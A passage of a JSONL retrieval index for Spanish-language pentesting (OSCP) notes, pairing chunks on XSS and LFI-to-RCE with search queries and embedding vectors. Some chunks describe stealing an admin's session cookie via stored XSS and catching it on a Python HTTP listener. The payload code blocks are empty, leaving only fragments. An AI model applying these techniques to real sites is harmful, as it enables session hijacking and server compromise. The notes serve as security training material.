0.08966, 0.04119, 0.01941, 0.02806, -0.17098, -0.06406, 0.02557, 0.09548, 0.14312, -0.05636, -0.00267, -0.13679, 0.0138, -0.00254, -0.08223, 0.05597, -0.04125, 0.04215, -0.04067, 0.09878, 0.05053, -0.17526, -0.02716, 0.03558, 0.00667, 0.11999, -0.10842, -0.00959, -0.00745, -0.03707, 0.01455, -0.07964, -0.12908, 0.01924, 0.014, -0.03056, -0.08986, -0.1024, -0.0284, 0.01239, -0.03778, -0.1139, -0.00302, 0.11558, -0.02614, -0.0157, 0.11049, 0.03775, -0.06845, 0.02177, -0.08453, -0.05845, 0.05331, -0.12906, -0.07467, -0.06205, -0.04496, -0.08233, -0.01474, 0.19351, 0.00261, -0.00309, -0.04647, -0.06393, -0.11874, 0.03698, -0.05405, 0.04611, 0.01186, -0.03804, -0.02978, -0.01967, 0.12527, 0.03557, 0.10226, 0.09235, -0.02081, 0.04385, -0.09039, 0.04614, 0.00556, -0.04941, -0.07641, -0.00692, -0.10057, -0.01928, 0.02011, 0.09354, -0.00971, -0.02044, 0.09667, -0.03645, 0.06532, -0.07099, -0.04454, -0.00508, 0.00091, -0.09718, 0.03435, -0.03043, -0.06125, -0.07461, -0.00646, -0.05304, 0.08561, 0.08226, -0.04166, -0.02666, -0.06209, 0.01176, 0.03182, -0.00835, 0.07071, 0.01018, -0.05553, -0.06088, -0.13953, -0.11789, 0.09117, -0.06878, 0.06827, -0.0357, 0.00868, -0.09434, -0.05918, -0.01099, -0.0486, -0.0666, 0.10998, -0.03502, -0.01917, -0.04719, 0.06486, 0.00732, 0.03007, -0.06292, -0.02408, 0.07381, 0.03563, 0.00311, 0.0898, 0.04619, -0.05326, 0.05136, -0.06292, -0.03429, -0.07057, 0.01309, -0.05617, 0.02232, -0.07369, -0.06752, 0.0603, -0.02555, -0.02539, 0.07776, 0.01312, -0.01798, -0.00454, -0.00163, 0.06754, -0.05133, -0.03512, 0.00368, -0.06314, -0.09745, 0.01952, 0.05213, -0.04784, -0.02104, 0.00602, -0.02376, -0.04864, 0.02068, 0.07354, -0.05342, -0.03167, -0.05608, 0.02551, 0.05254, -0.04952, 0.02644, -0.02144, -0.06341, -0.01636, 0.07664, 0.00694, -0.02006, -0.0331, 0.07639, 0.00045, 0.01986, 0.03856, 0.01192, -0.05269, 0.04422, -0.04798, -0.03751, 0.06332, -0.0347, -0.05495, -0.02944, -0.05432, 0.0328, -0.01084, -0.01172, -0.00889, -0.04788, -0.02138, 0.00234, 0.00892, -0.01058, -0.02576, 0.0091, -0.05427, -0.06731, 0.04628, -0.02239, -0.05277, -0.05019, 0.02965, 0.0111, 0.04261, 0.00778, 0.02094]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Tipos\n```\nReflected β†’ tu payload vuelve en la respuesta de ESA peticiΓ³n (?q=\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "que herramienta me sirve para probar marcadores de XSS", "v": [0.04814, -0.02236, -0.18164, -0.12738, -0.05338, -0.11686, -0.12756, -0.10759, 0.0443, -0.08838, -0.01515, 0.03009, 0.09194, -0.14504, 0.02409, 0.11974, 0.06096, -0.07363, -0.03678, 0.05948, 0.13758, -0.03393, -0.22395, -0.13234, -0.05553, -0.00179, 0.01981, -0.0837, -0.16375, 0.05759, -0.08467, 0.01247, 0.02028, -0.07902, -0.11341, -0.12136, -0.05885, 0.01236, 0.05572, 0.08722, 0.0634, -0.01206, -0.08915, 0.02321, 0.03829, 0.04074, -0.07672, 0.06437, -0.12819, 0.05298, 0.06326, -0.15349, -0.15719, 0.05463, -0.08271, -0.10476, 0.13578, -0.07538, -0.03434, -0.07427, -0.00489, -0.02531, -0.01541, -0.06106, 0.01553, -0.11522, -0.01812, -0.05804, -0.08001, 0.00243, -0.06057, 0.05004, 0.04905, -0.10105, -0.0185, 0.03193, 0.09514, 0.01576, 0.05672, 0.04653, 0.05566, -0.06444, -0.10892, 0.02192, -0.00074, -0.03149, -0.01241, -0.08967, -0.00142, -0.16115, 0.06586, 0.06584, 0.01655, 0.02129, 0.05489, -0.03775, 0.13238, -0.0487, 0.06824, -0.01457, 0.17653, -0.03303, -0.08227, 0.02054, -0.06435, -0.06343, -0.01825, 0.01983, -0.03257, -0.0332, 0.11836, -0.05733, -0.06649, 0.03316, 0.02275, 0.02603, -0.00315, -0.03626, -0.04684, -0.01579, 0.05147, 0.04949, -0.0806, -0.01828, 0.03123, -0.0515, 0.02565, 0.00496, 0.05428, -0.0098, 0.03817, -0.03484, -0.01554, 0.06185, -0.09055, -0.01796, 0.03438, -0.04637, -0.02356, -0.04319, 0.01404, 0.04547, 0.0045, -0.08374, -0.02447, 0.07781, 0.03533, 0.0665, -0.03183, 0.01067, -0.02708, -0.11247, 0.02598, 0.06927, -0.09831, -0.02761, 0.01442, 0.08334, -0.045, 0.02862, -0.11756, -0.01358, 0.05662, 0.08374, 0.02925, -0.03568, 0.05554, -0.01671, 0.0772, 0.04699, 0.00988, 0.01408, 0.0366, -0.06267, 0.04074, -0.05629, -0.08037, -0.0373, 0.06157, -0.04541, 0.00649, 0.01809, 0.01123, -0.00011, 0.01104, -0.06387, 0.01244, 0.00703, 0.04507, 0.00462, -0.06066, -0.01617, 0.02934, -0.07564, 0.06022, -0.04876, 0.04821, -0.02782, 0.00514, -0.06965, -0.02817, -0.031, -0.00669, -0.05067, 0.0502, 0.01352, -0.04632, -0.00803, -0.0036, 0.04308, 0.02997, 0.00964, 0.05432, -0.01525, -0.02937, -0.01502, 0.02278, 0.01806, -0.04032, 0.01399, -0.02876, -0.00269, 0.05228, -0.02783, -0.01116, 0.04607, 0.024, -0.06503, -0.00067, -0.05184, 0.02547, -0.04776, -0.05622, 0.04175, 0.02968, -0.01349, -0.01617, -0.02264, -0.03336, -0.06604, 0.00631, 0.07172, -0.00237, -0.06992, -0.03386, -0.07147, -0.0068, -0.00492, -0.00392, -0.01839, 0.02688, 0.03101, 0.05034, 0.00764, -0.00355, 0.03546]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n y payloads\n```html\n\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "con que puedo verificar si un script se renderiza en el navegador", "v": [-0.0513, 0.01982, -0.32686, -0.19317, 0.02301, -0.05473, -0.01392, 0.0471, 0.09892, -0.18667, -0.05422, -0.11896, -0.03264, -0.17333, 0.06255, 0.15103, -0.03849, 0.01063, 0.08983, 0.06131, 0.04453, -0.12104, 0.00568, -0.08142, 0.01603, 0.05505, -0.0898, 0.06959, -0.02226, -0.16453, -0.09292, -0.04235, 0.08564, 0.02923, -0.12601, 0.00359, 0.14927, 0.01789, 0.02398, 0.05068, -0.02283, 0.09057, -0.03331, 0.06301, -0.06198, 0.04972, -0.00295, -0.01007, -0.07885, -0.11355, 0.05839, 0.03206, -0.10436, 0.08822, -0.07186, 0.01945, 0.08417, -0.14034, 0.1099, -0.06311, 0.04139, -0.04136, -0.01101, 0.04966, -0.05442, 0.02442, 0.00817, 0.07022, 0.01946, -0.07337, 0.02582, 0.05022, -0.04029, 0.0043, -0.08772, 0.04203, -0.05631, -0.04314, 0.10441, 0.0442, 0.03647, 0.07118, -0.06627, -0.04044, -0.03228, -0.12839, -0.10629, -0.08542, 0.04961, -0.0915, 0.0525, 0.14069, -0.06825, 0.04411, -0.0211, -0.03033, 0.06694, -0.01585, -0.01562, 0.00336, 0.00948, -0.08464, -0.06995, 0.03449, 0.05476, 0.06182, 0.10052, -0.07593, -0.02771, -0.03392, 0.03604, 0.00658, -0.17437, -0.02887, 0.0075, 0.03058, -0.06302, -0.10195, 0.01104, -0.08951, -0.03997, 0.02171, -0.08866, -0.02767, -0.02193, 0.03736, -0.02657, 0.01043, -0.04865, -0.00632, -0.02654, -0.02243, -0.1117, -0.05763, -0.07507, 0.0261, 0.00163, -0.01721, 0.04397, 0.02602, 0.02679, 0.02469, 0.08251, 0.04323, 0.08735, -0.02935, -0.09597, -0.0338, -0.12492, -0.05171, 0.01146, 0.00083, 0.01534, 0.0548, -0.03533, 0.01216, -0.00837, 0.0412, 0.06075, 0.00639, 0.01604, 0.03013, 0.00155, 0.04953, 0.0059, -0.00654, -0.05039, 0.00101, 0.11856, 0.03218, 0.02559, -0.01207, 0.02287, -0.09692, 0.0556, -0.00898, -0.01837, 0.00423, -0.05861, -0.02401, 0.0282, -0.02452, 0.02235, -0.00748, -0.07684, -0.05861, 0.02545, 0.01419, -0.06256, 0.04318, 0.06839, 0.0943, -0.02185, -0.00272, 0.08895, 0.00539, -0.01802, 0.02171, -0.00548, -0.03102, 0.00632, -0.00793, 0.0009, -0.07189, -0.00737, 0.01897, -0.00995, -0.02245, 0.03851, -0.03711, 0.00753, -0.00913, 0.0518, -0.02247, 0.01917, -0.01314, 0.03943, 0.01513, -0.04762, -0.03271, 0.01249, -0.00322, 0.01072, -0.01767, 0.04468, -0.01986, 0.02726, 0.0307, -0.05315, 0.04276, -0.01197, 0.012, -0.03759, 0.03122, 0.02259, 0.01405, 0.00278, -0.02738, -0.05695, -0.0353, -0.02051, 0.03452, 0.03596, -0.03703, 0.01471, 0.02724, -0.07934, -0.05478, -0.01513, -0.02995, -0.01122, 0.00082, 0.02417, -0.03317, 0.00422, 0.00887]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n y payloads\n```html\n\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "cual programa detecta payloads de inyecciΓ³n XSS", "v": [0.106, -0.04017, -0.08435, -0.04933, 0.05567, -0.10128, -0.00455, -0.11329, -0.04547, 0.08289, -0.0426, 0.02104, -0.05893, 0.01531, -0.09916, 0.02969, -0.01637, 0.01804, -0.03743, -0.03893, 0.00818, -0.02851, -0.09071, -0.12156, 0.01391, 0.20136, -0.12516, -0.01172, -0.11032, -0.07075, -0.01509, -0.04404, 0.06321, -0.00987, -0.04332, 0.00364, -0.07179, 0.1166, 0.06764, 0.13217, 0.05249, 0.04567, -0.14354, 0.03786, 0.18803, -0.00214, 0.06778, 0.04037, -0.00844, -0.13951, 0.06028, 0.12469, -0.04313, 0.00288, 0.01175, -0.13879, 0.07487, -0.10637, -0.09232, 0.02601, 0.05267, 0.09173, 0.03739, -0.09235, -0.0755, -0.09945, 0.0551, -0.00542, -0.01227, -0.12581, 0.04269, -0.06136, 0.03936, 0.02259, 0.01124, -0.00338, 0.01384, 0.0223, 0.05387, 0.05737, 0.0265, -0.03298, -0.02836, 0.105, -0.02355, 0.01131, 0.0305, -0.0377, 0.02791, -0.11907, 0.06507, 0.00286, -0.00034, 0.14984, 0.06891, -0.02389, 0.14825, -0.04067, 0.0306, 0.07282, 0.07791, -0.02802, -0.00718, 0.0291, 0.00271, 0.06844, -1e-05, -0.02475, 0.00174, -0.04226, 0.14754, -0.07958, -0.00841, -0.03825, -0.07463, -0.06055, 0.0302, 0.11525, 0.002, -0.07385, -0.11018, 0.07742, -0.01903, 0.02037, 0.08125, -0.13311, -0.06339, 0.05805, 0.02932, 0.06411, 0.04374, 0.05993, 0.05125, -0.00063, -0.07272, -0.06002, 0.03312, 0.01175, -0.08685, -0.00324, 0.06811, 0.0637, 0.15274, 0.06849, 0.00512, 0.08662, -0.00063, 0.01998, 0.00938, -0.01865, 0.01195, 0.02257, -0.00133, 0.0455, -0.04193, -0.07385, 0.06459, 0.0572, -0.05098, 0.01674, -0.04146, 0.02799, -0.01956, 0.01974, 0.04167, -0.0343, 0.01907, 0.00537, 0.0185, 0.1329, 0.00281, 0.04106, 0.01452, -0.02205, -0.00274, -0.03127, -0.06935, -0.11441, 0.12648, -0.00831, -0.10617, 0.06433, 0.06304, 0.0481, 0.01262, -0.06163, -0.07593, 0.083, 0.0677, 0.00465, -0.00243, -0.03134, -0.02718, -0.08225, 0.02534, -0.07958, 0.01165, 0.03665, 0.04423, -0.04806, 0.00892, -0.00087, 0.01795, -0.04809, 0.00647, -0.00848, -0.03883, -0.04916, 0.01602, 0.05455, 0.0511, -0.0429, 0.05958, 0.02304, -0.05406, -0.05481, -0.01624, 0.00013, 0.00168, 0.08984, -0.07001, -0.03258, 0.07349, -0.04454, -0.03069, -0.03591, 0.05233, 0.01701, 0.05707, -0.00486, -0.00522, -0.00133, -0.04877, 0.02863, 0.0771, 0.02825, -0.04994, 0.00657, -0.01417, -0.06371, 0.06911, 0.05081, -0.04138, -0.0756, -0.02367, 0.00671, -0.03012, 0.02702, 0.03261, 0.01793, 0.01573, 0.12176, 0.03868, -0.0107, 0.04403, 0.05116]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "ΒΏhay alguna tΓ©cnica para robar las cookies de sesiΓ³n mediante XSS?", "v": [-0.08536, -0.12582, -0.0088, 0.02263, -0.08659, -0.23045, -0.03973, 0.05395, 0.06501, -0.00673, -0.23472, -0.0134, 0.09472, 0.01387, 0.08123, -0.05945, 0.00415, 0.1118, 0.08552, 0.04018, 0.04759, 0.01118, -0.11, 0.0392, 0.17499, 0.00358, 0.06644, -0.09427, -0.10456, -0.05038, 0.02987, -0.07039, 0.06288, -0.02456, -0.17488, -0.02996, 0.01837, -0.035, 0.05452, 0.03671, 0.04707, -0.07163, -0.01822, 0.02216, 0.20725, -0.087, -0.06427, 0.08455, 0.03705, 0.02783, 0.17829, 0.04853, -0.08496, 0.07011, -0.07466, -0.00208, 0.05635, -0.08497, -0.01687, -0.08453, -0.00832, 0.05119, -0.03615, 0.00697, 0.08278, -0.10658, 0.02057, -0.05347, 0.11567, 0.02801, -0.05902, -0.05022, -0.01456, -0.03037, 0.1096, -0.03454, 0.01359, 0.07417, 0.02226, -0.00458, -0.05272, -0.01969, -0.06341, 0.009, -0.09698, 0.0919, 0.05592, -0.00577, -0.01156, -0.11941, 0.08897, 0.12067, -0.03307, -0.1172, 0.04329, -0.0559, 0.05173, 0.00073, 0.02494, 0.08669, 0.1088, -0.02817, -0.05851, 0.06439, -0.06598, -0.03465, -0.05408, -0.00043, 0.02896, -0.09257, -0.10916, 0.00565, -0.09513, -0.03992, 0.04526, 0.04551, -0.02895, -0.00291, -0.14039, -0.02498, 0.00231, -0.01478, -0.05914, 0.0045, -0.0105, -0.10742, 0.02642, 0.0816, -0.05641, -0.0339, 0.0008, 0.03594, 0.01746, 0.04847, -0.03277, 0.06365, 0.10358, -0.07234, -0.11555, -0.08704, -0.03221, 0.05585, 0.04353, 0.04675, -0.02988, 0.0611, 0.02435, 0.0589, -0.01445, -0.12924, -0.00135, -0.0757, -0.00994, 0.03689, 0.02651, 0.03936, 0.02264, -0.04427, -0.02154, 0.03684, -0.10109, -0.00261, -0.03554, -0.03303, -0.04915, -0.09615, -0.02401, -0.02328, 0.03664, 0.04279, -0.01918, -0.02, 0.01191, -0.01737, 0.01598, -0.01645, -0.03526, -0.07113, 0.01785, -0.03477, -0.0166, -0.01205, 0.08364, 0.00606, -0.01072, -0.00943, 0.00843, 0.06405, -0.01576, -0.03097, -0.00445, -0.04778, -0.07366, -0.00046, 0.00483, -0.08473, -0.01237, 0.04057, 0.02774, 0.03712, 0.05573, 0.04611, 0.02978, 0.03899, 0.03994, -0.02399, -0.01555, -0.11563, -0.06971, -0.03676, 0.05652, 0.04073, 0.03714, 0.02167, 0.01792, -0.02382, -0.02159, 0.0208, -0.05948, -0.00476, -0.05249, 0.00227, 0.05377, 0.01721, -0.00029, 0.06025, 0.01982, -0.0033, -0.02702, -0.02579, -0.04167, 0.01767, -0.04331, 0.04075, 0.06398, 0.03471, 0.00142, 0.006, 0.05989, -0.0477, -0.00303, 0.10168, -0.01954, -0.04402, -0.04232, 0.04961, -0.09617, 0.0441, 0.04883, -0.0031, 0.0689, 0.001, -0.05148, 0.0242, -0.02163, -0.02169]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "cΓ³mo puedo explotar un panel de administraciΓ³n para obtener acceso al servidor?", "v": [0.00746, 0.13492, -0.11985, -0.25278, -0.0752, -0.08495, 0.10957, -0.12322, -0.10443, 0.03961, -0.19132, -0.08412, 0.044, -0.03177, 0.01601, 0.04433, 0.16384, -0.06015, 0.03154, 0.06982, 0.04984, 0.10483, -0.00975, 0.00826, -0.05294, 0.06541, 0.01653, -0.09163, -0.04277, -0.05497, -0.00249, -0.03073, -0.02218, -0.00783, 0.06271, 0.00425, 0.00806, 0.18179, -0.0398, 0.02722, -0.01036, -0.03128, -0.09744, 0.0293, 0.05408, -0.03473, 0.0472, -0.0671, 0.07203, -0.07438, -0.1242, -0.11268, -0.17975, -0.04187, 0.08346, 0.07023, 0.0651, -0.17494, 0.05907, 0.03305, -0.11899, 0.0061, -0.03371, -0.05516, 0.02865, -0.00358, 0.0099, 0.02691, -0.07456, 0.06824, -0.05148, 0.01592, -0.02816, -0.00743, 0.03302, 0.03373, -0.04293, 0.0186, 0.05941, 0.04375, -0.0409, 0.05975, -0.10324, 0.11459, -0.17922, -0.10721, 0.02349, -0.11753, -0.00464, 0.01167, 0.03119, -0.0477, -0.0901, 0.00157, -0.01336, -0.05091, 0.03964, -0.08564, -0.01851, 0.03911, 0.06057, 0.07377, -0.06173, 0.12253, 0.03008, 0.14248, 0.04852, -0.09313, 0.0266, -0.1083, -0.00637, -0.00857, -0.05414, 0.05475, -0.03314, -0.09594, -0.11428, 0.02463, -0.06324, 0.00067, -0.08339, -0.09212, 0.05003, -6e-05, 0.08486, -0.08213, 0.09918, 0.05689, -0.04172, -0.08619, 0.0083, -0.01703, 0.01811, 0.04364, -0.01245, 0.02738, 0.00906, -0.02585, -0.08615, -0.06373, 0.03448, 0.01177, -0.00543, -0.03356, 0.07176, -0.03721, 0.05059, -0.06012, 0.01793, 0.0221, 0.03521, -0.06654, 0.0179, 0.04459, -0.09366, -0.04203, 0.00883, -0.0372, -0.01932, 0.04496, -0.00435, -0.0019, 0.013, 0.10005, 0.00941, 0.01083, -0.04032, -0.01282, 0.04687, 0.01597, 0.00576, 0.04799, 0.03213, -0.01589, 0.04488, -0.03948, -0.03358, -0.06839, 0.02237, -0.01416, -0.04317, 0.01202, -0.07732, 0.0249, -0.03468, 0.00794, -0.00813, -0.02984, -0.00818, 0.09802, 0.08398, 0.0121, -0.02949, 0.05487, 0.06221, -0.05015, 0.00667, -0.00217, -0.04561, -0.04109, 0.02229, 0.01422, -0.00042, -0.0595, 0.01058, -0.00111, -0.04351, 0.0605, -0.02114, 0.05143, 0.02791, 0.01014, 0.12104, -0.04694, -0.06996, -0.02991, 0.05427, -0.03291, 0.01264, -0.03464, 0.01763, 0.0797, 0.03795, 0.04072, 0.0723, -0.00588, -0.04283, 0.03042, 0.02691, 0.02063, -0.04436, 0.09993, -0.02004, 0.0243, 0.0251, -0.0316, 0.02054, -0.04927, -0.04189, -0.03772, 0.0347, 0.10349, 0.00128, -0.02131, 0.00106, -0.07047, -0.01058, -0.00065, -0.03114, -0.00875, -0.01742, -0.03508, 0.03606, 0.00604, 0.0154, -0.01142]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "quΓ© mΓ©todo sirve para realizar ataques de autenticaciΓ³n usando imΓ‘genes.", "v": [-0.0392, 0.16307, -0.26597, -0.11053, 0.01028, -0.06886, -0.01063, -0.01007, -0.02053, 0.00582, -0.0236, -0.10013, 0.00654, 0.00974, 0.08867, -0.07175, 0.18311, -0.0886, 0.11538, -0.05411, 0.01814, -0.04039, -0.05919, -0.06581, -0.07437, 0.03169, 0.00887, 0.03891, -0.06276, -0.04875, 0.01734, 0.05937, 0.05404, 0.02294, -0.11488, -0.06544, 0.03322, 0.02034, -0.01393, 0.1076, -0.02744, -0.0428, -0.20687, -0.02355, 0.03276, 0.00473, 0.03607, -0.02597, -0.03268, 0.05306, 0.0837, 0.06651, -0.19168, 0.02059, -0.15779, -0.11904, 0.04411, -0.08436, 0.05307, -0.00825, -0.02365, 0.03492, 0.02743, 0.04697, 0.0815, -0.06381, 0.0318, 0.01386, -0.04898, 0.01319, 0.04924, 0.00701, 0.04886, 0.03144, -0.00912, -0.02922, -0.01714, 0.01504, 0.00582, -0.07279, -0.03433, -0.01969, -0.10332, -0.00674, -0.16195, -0.01043, 0.04991, -0.05898, 0.00484, -0.18042, 0.00412, -0.0116, 0.06973, -0.03993, 0.01329, 0.00167, -0.03894, -0.05134, 0.07316, -0.01196, 0.09887, -0.09371, -0.12706, 0.0841, 0.02084, 0.04426, 0.02159, -0.07016, -0.09427, -0.16494, -0.0405, -0.05301, -0.07102, -0.02016, -0.08559, -0.05784, -0.03485, -0.05754, -0.02261, -0.01865, -0.07955, 0.02323, -0.02787, 0.05475, 0.01255, -0.00462, 0.02233, 0.04449, -0.0812, -0.05049, -0.06342, 0.00205, -0.02167, 0.01608, -0.06252, 0.0176, 0.10335, -0.15974, -0.04935, -0.04962, 0.0351, 0.11064, 0.01352, -0.06557, 0.02236, 0.04492, 0.02324, -0.10971, -0.10863, -0.00673, 0.04748, -0.0044, -0.00345, 0.05007, -0.01285, -0.05627, -0.03454, -0.10379, -0.10586, 0.10841, -0.05201, 0.03902, 0.026, 0.09832, -0.09812, -0.0624, -0.03629, -0.02223, 0.02662, 0.05782, 0.05868, 0.0821, 0.01647, -0.07969, 0.07635, 0.06511, -0.0133, -0.11269, -0.00126, -0.02279, -0.02633, -0.01649, -0.02146, 0.00444, 0.05642, 0.01134, 0.02486, 0.0449, 0.02466, 0.0584, -0.02481, -0.01811, -0.00913, 0.04013, 0.0243, 0.00994, -0.05046, -0.01882, 0.05666, 0.01502, -0.03438, -0.04263, -0.01002, -0.03711, 0.04991, 0.02519, -0.04297, -0.03348, -0.03401, 0.01456, 0.01369, -0.00091, 0.06314, -0.06882, -0.02804, 0.00928, -0.01063, -0.04984, -0.07918, 0.001, 0.00407, 0.01528, -0.01876, 0.08468, -0.01439, 0.0553, -0.01875, -0.07254, -0.01146, -0.01086, 0.01267, 0.02843, -0.05146, 0.00076, 0.03746, -0.01449, 0.0392, -0.01806, -0.04509, -0.09807, 0.01753, -0.01593, -0.03949, 0.00314, -0.03724, -0.03787, -0.07193, -0.01932, 0.06199, -0.08727, 0.02885, 0.02476, 0.02382, 0.01297, -0.00544, -0.06356]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "que programa o herramienta sirve para identificar fallos de Local File Inclusion en una pΓ‘gina web?", "v": [-0.08655, 0.06883, -0.01305, -0.20878, 0.08027, -0.27713, -0.02945, -0.14144, -0.04271, -0.04108, -0.08646, -0.09357, -0.04186, -0.06789, 0.0221, 0.07561, 0.07093, -0.23653, -0.00381, -0.09443, -0.13215, 0.02637, -0.11032, -0.0662, -0.1303, -0.05809, -0.02323, -0.03135, -0.13986, -0.01219, 0.07597, -0.07655, 0.00543, -0.05736, -0.05917, -0.09277, 0.00059, -0.00789, -0.04582, 0.04805, 0.05736, 0.05883, -0.13032, 0.09428, -0.01996, -0.0057, -0.03448, 0.00209, 0.07377, 0.10977, 0.01166, -0.1878, -0.00946, 0.01791, 0.00378, -0.17951, 0.1092, -0.11702, 0.02238, -0.0621, -0.11773, -0.01378, -0.05601, -0.05703, 0.01149, -0.0474, 0.01679, 0.02424, -0.00132, 0.01256, -0.03225, -0.00956, 0.09536, -0.02471, 0.00129, -0.02285, 0.02074, 0.03346, 0.11929, -0.07252, 0.06728, 0.01918, -0.04546, 0.02965, -0.10077, -0.02683, 0.03853, -0.0141, 0.02806, -0.12414, -0.0158, 0.13195, 0.0502, 0.03162, 0.03696, -0.05077, 0.16729, 0.0425, 0.01644, -0.02033, 0.09411, -0.08802, -0.04997, 0.04295, 0.03261, 0.07192, 0.00397, 0.04006, -0.06007, 0.03298, 0.08026, 0.02983, -0.01045, 0.00142, -0.12537, 0.08665, 0.01755, 0.01766, 0.03844, -0.04042, -0.02795, 0.00125, -0.06804, -0.00103, -0.0127, 0.04835, -0.05324, 0.06138, -0.04517, -0.03331, 0.01772, -0.02225, -0.06424, 0.01565, -0.01806, -0.0488, 0.08241, -0.00225, -0.01406, -0.00656, 0.0302, -0.06056, -0.04502, 0.00595, 0.02173, -0.04115, -0.00533, -0.03764, -0.08415, 0.02107, 0.01016, -0.00878, -0.04872, 0.01097, -0.07305, 0.00705, -0.00778, 0.02361, -0.08364, -0.00984, -0.06503, -0.02229, 0.09624, -0.00085, 0.04803, -0.03029, -0.03571, 0.08522, 0.11208, 0.04946, 0.00371, 0.06657, -0.00638, -0.1129, -0.07337, -0.04391, -0.06085, -0.02637, 0.05177, -0.02803, -0.0371, 0.01359, 0.0665, 0.01049, 0.00274, -0.05724, 0.0226, -0.00187, -0.02555, -0.01127, 0.02699, -0.01573, -0.04114, 0.03411, 0.00381, 0.04777, -0.05946, -0.02941, 0.05957, -0.00416, -0.08896, -0.04788, -0.00785, -0.02973, 0.01496, 0.09808, -0.0124, -0.06601, 0.0221, 0.03988, -0.00608, -0.01227, 0.0584, -0.02438, -0.01652, -0.04026, 0.05747, 0.05346, 0.00558, 0.00035, 0.0377, -0.00295, 0.02661, 0.04903, 0.0102, -0.01564, 0.04681, -0.02225, 0.00213, 0.03854, 0.02522, -0.0734, -0.0288, -0.04108, 0.04556, -0.08597, 0.03336, -0.0012, -0.04488, -0.04686, -0.00915, 0.06293, 0.03097, -0.03367, -0.00149, -0.02975, -0.05223, -0.08282, 0.01693, -0.03662, -0.05457, -0.00298, 0.03693, -0.02841, 0.05901, 0.02305]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "cual es la mejor tecnica o metodo para convertir un ataque de Local File Inclusion en RCE?", "v": [-0.20476, -0.03342, -0.04867, -0.12473, 0.01111, -0.17581, -0.0011, -0.06409, -0.05219, -0.02208, -0.09843, -0.07989, 0.02481, -0.04652, 0.13127, -0.00056, 0.04504, -0.08593, 0.08229, -0.19937, -0.06262, -0.13754, -0.09998, -0.06335, 0.03356, -0.02095, -0.01145, -0.01038, -0.09293, -0.11327, 0.05409, -0.04136, 0.07166, 0.04404, -0.00521, -0.13051, 0.03615, -0.0069, -0.04091, 0.0507, -0.08385, -0.05294, -0.25572, 0.14258, 0.10453, -0.04016, 0.08676, 0.11489, 0.05995, 0.03245, 0.03467, 0.01645, -0.03955, -0.10076, -0.02014, -0.10942, -0.0067, -0.04059, -0.01248, -0.03549, -0.00878, 0.02584, 0.00652, -0.09439, 0.06418, -0.03458, -0.02222, -0.02398, -0.09908, -0.04532, 0.01265, 0.0631, 0.03013, 0.05044, -0.04109, 0.01741, -0.00357, 0.09657, 0.0879, -0.13977, 0.03508, 0.02321, -0.11956, -0.02284, -0.10157, 0.02348, 0.12826, -0.15687, 0.02838, -0.08648, -0.02908, -0.07752, 0.04481, -5e-05, 0.0394, -0.08279, 0.08466, 0.01165, -0.02792, 0.02045, 0.0583, -0.06422, -0.08094, 0.08984, 0.07331, 0.04558, -0.03803, -0.0115, -0.01112, -0.09418, -0.05153, 0.07716, -0.06528, 0.1002, -0.10774, -0.04959, -0.01955, -0.01147, -0.07029, 0.01563, -0.09332, 0.00639, -0.08, 0.04895, -0.00821, -0.00055, -0.03286, -0.02263, -0.07604, 0.02393, -0.04418, -0.04328, 0.0406, -0.0288, 